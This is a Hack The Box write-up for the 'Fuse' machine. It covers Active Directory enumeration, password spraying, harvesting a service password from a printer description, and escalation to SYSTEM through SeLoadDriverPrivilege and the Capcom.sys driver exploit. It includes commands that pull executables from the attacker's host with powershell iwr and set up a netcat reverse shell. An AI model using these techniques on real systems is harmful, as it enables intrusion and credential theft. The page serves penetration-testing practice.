Hackthebox – Fuse

As with any box, I started Fuse with several portscans

root@kalivm:~/Fuse# nmap -oN fullscan-A -A 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 11:49 CEST
Nmap scan report for 10.10.10.193 (10.10.10.193)
Host is up (0.065s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-19 10:07:06Z)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
464/tcp open  kpasswd5?
593/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEDC88B%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m01s, deviation: 4h02m39s, median: 16m55s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-19T03:07:43-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported 
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-19T10:07:42
|_  start_date: 2020-06-19T10:06:51

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   14.40 ms  10.10.14.1 (10.10.14.1)
2   ... 21
22  897.73 ms 10.10.14.1 (10.10.14.1)
23  897.48 ms 10.10.14.1 (10.10.14.1)
24  897.31 ms 10.10.14.1 (10.10.14.1)
25  897.08 ms 10.10.14.1 (10.10.14.1)
26  ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.11 seconds

A standard windows domain-controller-like setup with ldap, smb but also port 80 for a web server. Using the regular options (enum4linux, ldapsearch) I did not yet get anything useful, so I decided to take a look at the website which appeared to be quite useful.
webstie not found on ip
At first, when opening the IP Address in my browser, it immediately redirected to fuse.fabricorp.local. Since I did not have that entry yet in my hosts file, a page not found error occured.
PaperCut Print Logger web page
After putting the hostname and IP address combination in the /etc/hosts file, the page did resolve and it showed a PaperCut Print Logger. Print servers are usually a nice goldmine of information, so it’s time to see if the CTF-Creator has replicated this experience.
PaperCut CSV export file
The creator did a pretty good job. A nice combination of usernames to be found. And also one reference to a possible password. All even nicely exportable to CSV Files! After putting the usernames in a users file, and the Fabricorp01 as potential password in a passwords file, I decided to use msf to check if any of the username/password combinations would be useful.

root@kalivm:~/Fuse# msfconsole 
---snip---
msf5 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner

msf5 > use 0
msf5 auxiliary(scanner/smb/smb_login) > set user_file users
user_file => users
msf5 auxiliary(scanner/smb/smb_login) > set pass_file passwords
pass_file => passwords
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\sthompson:Fabricorp01',
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\pmerton:Fabricorp01',
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\administrator:Fabricorp01',
[*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This appeared to be the right approach as I now had at least 3 accounts which I could use, bnielson, tlavel and bhult.

root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

However, for each of these users, I got a ‘password must change’ message, disallowing the login.
After some small search about how to change a windows password from a linux machine, I found that smbpasswd could do this.

root@kalivm:~/Fuse# smbpasswd -r 10.10.10.193 bnielson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.

So there I changed the password from Fabricorp01 to Fabricorp011 and it appeared succesful.

root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        prnproc$        Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

After a quick check, it was successful indeed but after a minute or so, the password got back to the old ‘Password Must Change’ error again with the old password. Apparently, there’s a script running that resets the password so that other people on HTB can exploit the machine as well. A good thing, but quite annoying. After some searching around, I got kinda stuck and asked on Discord for a quick nudge where someone pointed me out to RPC as protocol. Since port 135 is open, this should have been obvious but to me it wasn’t (yet). So I decided to reset bnielson’s password once more (I was at Fabricorp019 already) and try rpc.

root@kalivm:~/Fuse# rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password: 
rpcclient $>

That worked too! Nice, but what can I do with this. Simply typing help already gave an extensive list of commands, including several ‘enum’ commands. Enumeration is always key, so I started with enumdomusers, to see if there were more accounts to be found.

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

dmuir, astein, mberbatov, dandrews and two svc-accounts to be added to the list. Nice but smb_login did not give much more with the Fabricorp01 password. After some additional enumeration commands, I got to the enumprinters command.

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

With this command, a scan2docs password was displayed so I decide to run the smb_login check once more.

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\bnielson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\sthompson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\pmerton:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\dandrews:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\mberbatov:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\dmuir:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\administrator:$fab@s3Rv1ce$1',
[*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And there I’ve got two additional accounts with the password in the enumprinters setting.

root@kalivm:~/Fuse# evil-winrm -u svc-print -i 10.10.10.193
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

PS C:\Users\svc-print\Documents> 

After some trial and error on various services, I finally found out that the svc-print account also provides access through win-rm. Perhaps this finally provides me with the user-flag.

PS C:\Users\svc-print\Documents> cd ../Desktop
PS C:\Users\svc-print\Desktop> type user.txt
2edea93<NOFLAG>e4898c8621d2ed02d

And there’s the user flag, time for privilege escalation.

Privilege Escalation

After obtaining the flag, I started browsing around the system but did not yet find much useful information. The normal privilege escalation analysis did not lead to anything exploitable and the only thing kinda worthwhile was a readme.txt file in the root of the system

PS C:\> cat readme.txt
// MFT printing format issue
note to HP engineer:
The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.
This is a production environment and the "solution" should be developed and confirmed working in your testbed
All changes will be reverted every 2 mins.

So apparently there is something to do with printer issues. However I got kinda stuck at this point, until someone on Discord nudged me to look closely at the whoami /all command output.

PS C:\test> whoami /all 

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104

---snip---

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

At first, the output did not look all that useful, until I compared it to output on another windows box. It appeared that the SeLoadDriverPrivilege was added to the svc-print account. The first hit on google for exploiting these permissions, got me to this blogpost on tarlogic. In that blog post, both the EOPLoadDriver.exe and CapCom driver exploitation are linked which required compiling some c++ code. As I had not done this in a very long time (13+ years), I was kinda lost with the Visual Studio interface.

After watching some youtube videos and reading some docs, I finally managed to get the EoPLoadDriver.exe compiled. One of the most frustrating discoveries being that if you use existing code, Visual Studio completely ignores the files in the Project and only looks to its includes (such as stdafx.h) in the location of the original .cpp file.
Compiling the EoPLoadDriver exploit basis
I also analyzed the CapCom exploit and noticed it spawned a cmd-box on the original target. As I would not have a RDP Login on the machine, this would cause the exploit to be rather useless so I looked for alternative ways to use the exploit. During that research, I was also nudged towards this github page for the original CapCom.sys Exploit driver
Compiling the modified CapCom exploit basis
After modifying both the commandline in order for it to call a nc.exe and get a reverse shell back to my own system. I also changed the createProcess call to use ‘CREATE_NO_WINDOW’ and not spawn a commandbox. I compiled that to another .exe too and transferred all files to my kali machine.

PS C:\test> powershell iwr -uri http://10.10.14.2:8000/EOPL.exe -outfile EOPL.exe
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/Capcom.sys -outfile capcom.sys
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/ExploitCapcom.exe -outfile capcom.exe
PS C:\test> powershell IWR -uri http://10.10.14.2:8000/windows/nc.exe -outfile c:\windows\temp\nc.exe

I transferred all files to the target system, knowing that the test directory could be used, I stored all, but the nc.exe file in that location.

PS C:\test> ./EOPL.exe System\CurrentControlSet\MyService c:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0

I ran the EOPL.exe with the capcom.sys file and after several attempts, finally noticed it state NTSTATUS: 00000000, meaning all had gone well. (I had seen various errors which are all nicely explained by Microsoft here)

PS C:\test> .\capcom.exe 
[*] Capcom.sys exploit 
[*] Capcom.sys handle was obtained as 0000000000000064 
[*] Shellcode was placed at 000001D6EAF70008 
[+] Shellcode was executed 
[+] Token stealing was successful 
[+] The SYSTEM shell was launched 
[*] Press any key to exit this program

I ran the exploit with a listener ready in another terminal, and as this text scrolled by, in the other Terminal I noticed this:

root@kalivm:~/Fuse# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.193 54788
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\test> 

So now I’ve got a shell using the exploit, but I still have to verify if the exploit was successful.

PS C:\test> whoami
whoami
nt authority\system

Those are the highest privileges possible, all that is left, is to obtain the flag!

PS C:\test> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c05c1df<NOFLAG>808892ff741e42890

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.